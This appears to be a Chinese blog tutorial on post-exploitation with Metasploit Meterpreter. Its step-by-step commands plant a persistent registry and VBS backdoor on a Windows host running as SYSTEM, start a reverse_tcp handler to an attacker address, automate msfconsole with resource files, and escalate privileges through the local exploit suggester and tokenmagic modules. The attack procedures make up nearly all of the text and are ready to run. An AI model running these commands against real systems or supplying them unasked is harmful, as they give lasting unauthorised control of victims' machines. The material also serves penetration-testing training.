Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
晨欣5 分钟前
Umi-OCR:Windows7和Linux上可免费离线使用的OCR应用!
linux·运维·ocr
沐雨风栉22 分钟前
自建云音乐服务器:Navidrome+cpolar让无损音乐随身听
运维·服务器·redis·缓存·docker·容器
德迅云安全-如意23 分钟前
你知道服务器和电脑主机的区别吗?
运维·服务器
广州腾科助你拿下华为认证26 分钟前
华为HCIE数通考试难度解析
运维·服务器
Clownseven30 分钟前
VPS、云服务器、独立服务器的区别是什么?新手服务器选择指南
运维·服务器
跨境小新37 分钟前
静态住宅Facebook养号难不难?
运维·服务器
ZYMFZ1 小时前
Linux 防火墙 Iptables
linux·运维·服务器
河南博为智能科技有限公司1 小时前
单串口服务器-工业级串口联网解决方案
运维·服务器·物联网·边缘计算
爱喝水的鱼丶2 小时前
SAP-MM:SAP采购组织全面学习指南:从概念到实战配置图解
运维·开发语言·数据库·学习·sap·mm模块·采购组织
Rum_0M2 小时前
服务器内部信息获取
运维·服务器·web安全·网络安全·信息安全·职业技能大赛